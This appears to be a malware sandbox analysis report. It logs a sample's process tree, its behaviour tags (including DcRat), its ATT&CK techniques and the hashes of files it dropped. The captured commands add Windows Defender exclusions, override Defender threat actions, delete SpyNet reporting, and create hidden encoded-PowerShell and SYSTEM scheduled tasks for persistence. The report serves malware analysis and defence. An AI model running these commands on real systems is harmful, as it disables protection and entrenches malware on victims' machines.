\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BpmXCGkSTNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BpmXCGkSTNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KYhAKHECtWIvC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KYhAKHECtWIvC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJGvZSUioXRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJGvZSUioXRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wrndFtifU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wrndFtifU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LIYCBlCeAeRQzmVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\LIYCBlCeAeRQzmVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UAGVHuYmYMGQZIzG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UAGVHuYmYMGQZIzG\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BpmXCGkSTNUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BpmXCGkSTNUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BpmXCGkSTNUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KYhAKHECtWIvC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KYhAKHECtWIvC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJGvZSUioXRU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJGvZSUioXRU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wrndFtifU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wrndFtifU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LIYCBlCeAeRQzmVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\LIYCBlCeAeRQzmVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\QgmNzxRCOnLddotQj /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UAGVHuYmYMGQZIzG /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UAGVHuYmYMGQZIzG /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjKsgEbjX" /SC once /ST 05:32:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjKsgEbjX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjKsgEbjX"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hEOVRvlnWpJzMGvLw" /SC once /ST 03:34:45 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UAGVHuYmYMGQZIzG\qgXTFBpSSKOwGWB\oaLvSCW.exe\" cs /site_id 525403 /S" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hEOVRvlnWpJzMGvLw"2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\1781.dll1⤵
-
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\1781.dll2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\18BA.exeC:\Users\Admin\AppData\Local\Temp\18BA.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\18BA.exeC:\Users\Admin\AppData\Local\Temp\18BA.exe2⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\18BA.exe"C:\Users\Admin\AppData\Local\Temp\18BA.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\18BA.exe"C:\Users\Admin\AppData\Local\Temp\18BA.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\668f4dd7-105c-44f1-972d-cb6bf16be478\build2.exe"C:\Users\Admin\AppData\Local\668f4dd7-105c-44f1-972d-cb6bf16be478\build2.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\668f4dd7-105c-44f1-972d-cb6bf16be478\build2.exe"C:\Users\Admin\AppData\Local\668f4dd7-105c-44f1-972d-cb6bf16be478\build2.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\1AAF.exeC:\Users\Admin\AppData\Local\Temp\1AAF.exe1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\1C37.exeC:\Users\Admin\AppData\Local\Temp\1C37.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\Temp\UAGVHuYmYMGQZIzG\qgXTFBpSSKOwGWB\oaLvSCW.exeC:\Windows\Temp\UAGVHuYmYMGQZIzG\qgXTFBpSSKOwGWB\oaLvSCW.exe cs /site_id 525403 /S1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bfPiLOEoMHGtOUUyTU"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wrndFtifU\ADiKMh.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "CMIDffFQijmeSZd" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "CMIDffFQijmeSZd2" /F /xml "C:\Program Files (x86)\wrndFtifU\cUXIbIj.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "CMIDffFQijmeSZd"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "CMIDffFQijmeSZd"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FHrhfHAbDMoVgn" /F /xml "C:\Program Files (x86)\sJGvZSUioXRU2\CqqAbtH.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vGyDUozQLYzyN2" /F /xml "C:\ProgramData\LIYCBlCeAeRQzmVB\ACByebW.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LqDpKNkcwALTGagBI2" /F /xml "C:\Program Files (x86)\GHZfFSFOtQqZfAVtWsR\cweDAZY.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "admxdtfLtextKFmXkQj2" /F /xml "C:\Program Files (x86)\KYhAKHECtWIvC\OwrHoLH.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tzhoEZPqxAOMgijXP" /SC once /ST 04:04:37 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UAGVHuYmYMGQZIzG\bEhnnvWq\ZyvsAmQ.dll\",#1 /site_id 525403" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "tzhoEZPqxAOMgijXP"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hEOVRvlnWpJzMGvLw"2⤵
-
C:\Users\Admin\AppData\Roaming\gtdcvscC:\Users\Admin\AppData\Roaming\gtdcvsc1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\itdcvscC:\Users\Admin\AppData\Roaming\itdcvsc1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12732 -s 3402⤵
- Program crash
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UAGVHuYmYMGQZIzG\bEhnnvWq\ZyvsAmQ.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UAGVHuYmYMGQZIzG\bEhnnvWq\ZyvsAmQ.dll",#1 /site_id 5254032⤵
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tzhoEZPqxAOMgijXP"3⤵
-
C:\Users\Admin\AppData\Roaming\hudcvscC:\Users\Admin\AppData\Roaming\hudcvsc1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\hudcvscC:\Users\Admin\AppData\Roaming\hudcvsc2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 12732 -ip 127321⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
4Disabling Security Tools
1Virtualization/Sandbox Evasion
1File Permissions Modification
1Scripting
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\oMPcKCByxz6c6aQOVuge8D1R.exe.logFilesize
42B
MD584cfdb4b995b1dbf543b26b86c863adc
SHA1d2f47764908bf30036cf8248b9ff5541e2711fa2
SHA256d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b
SHA512485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce
-
C:\Users\Admin\AppData\Local\Temp\eTcHXU.OjDFilesize
1.4MB
MD541c8c2003f66e414a080e0a989788f2e
SHA120740ccc5f39d07b8b2efd5b320fedc35164de78
SHA2561736f19ac90d0a11ace6b83b997019d3cc6c05c38ed701ecaabe05d652d56639
SHA51230abac99a833603fb9fadf08868791d5e422e92a5e305fe4c96b7b81c63b532ab87a74861bfc23d3779ece609cab72e7966e93a4ce232dbcde4d05a004ddd209
-
C:\Users\Admin\AppData\Local\Temp\eTcHXu.OjDFilesize
1.4MB
MD541c8c2003f66e414a080e0a989788f2e
SHA120740ccc5f39d07b8b2efd5b320fedc35164de78
SHA2561736f19ac90d0a11ace6b83b997019d3cc6c05c38ed701ecaabe05d652d56639
SHA51230abac99a833603fb9fadf08868791d5e422e92a5e305fe4c96b7b81c63b532ab87a74861bfc23d3779ece609cab72e7966e93a4ce232dbcde4d05a004ddd209
-
C:\Users\Admin\AppData\Local\Temp\eTcHXu.OjDFilesize
1.4MB
MD541c8c2003f66e414a080e0a989788f2e
SHA120740ccc5f39d07b8b2efd5b320fedc35164de78
SHA2561736f19ac90d0a11ace6b83b997019d3cc6c05c38ed701ecaabe05d652d56639
SHA51230abac99a833603fb9fadf08868791d5e422e92a5e305fe4c96b7b81c63b532ab87a74861bfc23d3779ece609cab72e7966e93a4ce232dbcde4d05a004ddd209
-
C:\Users\Admin\Pictures\Minor Policy\5XX9Z8GfruEUHkqLJGNcaeDq.exeFilesize
1.7MB
MD5d2e0cb24fce237ce0feba8dbaed2320c
SHA16b9f608f4dc210259f513eda063244d68c6d21e2
SHA2566f001ffcf01b277bd49340fcf6dfaeaa8248bca8e6d9096caf1630e809d6bd17
SHA5121725c49f821aa7c8e64532dcf428c6d550d6624dcce3057c8b1b06a1465caf0b134b4b016dd7ecfb8dba7e9004874568ddbb2871e1ab26fdc01bde3b6d09ceb8
-
C:\Users\Admin\Pictures\Minor Policy\5XX9Z8GfruEUHkqLJGNcaeDq.exeFilesize
1.7MB
MD5d2e0cb24fce237ce0feba8dbaed2320c
SHA16b9f608f4dc210259f513eda063244d68c6d21e2
SHA2566f001ffcf01b277bd49340fcf6dfaeaa8248bca8e6d9096caf1630e809d6bd17
SHA5121725c49f821aa7c8e64532dcf428c6d550d6624dcce3057c8b1b06a1465caf0b134b4b016dd7ecfb8dba7e9004874568ddbb2871e1ab26fdc01bde3b6d09ceb8
-
C:\Users\Admin\Pictures\Minor Policy\5dql7piSRHDDYa_r8buffZkT.exeFilesize
400KB
MD59519c85c644869f182927d93e8e25a33
SHA1eadc9026e041f7013056f80e068ecf95940ea060
SHA256f0dc8fa1a18901ac46f4448e434c3885a456865a3a309840a1c4ac67fd56895b
